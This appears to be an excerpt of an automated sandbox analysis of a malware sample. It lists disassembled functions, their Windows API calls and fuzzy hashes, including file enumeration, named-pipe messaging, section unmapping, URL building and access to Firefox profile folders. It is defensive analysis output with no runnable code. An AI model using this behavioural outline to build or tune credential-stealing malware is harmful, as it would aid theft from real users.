    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
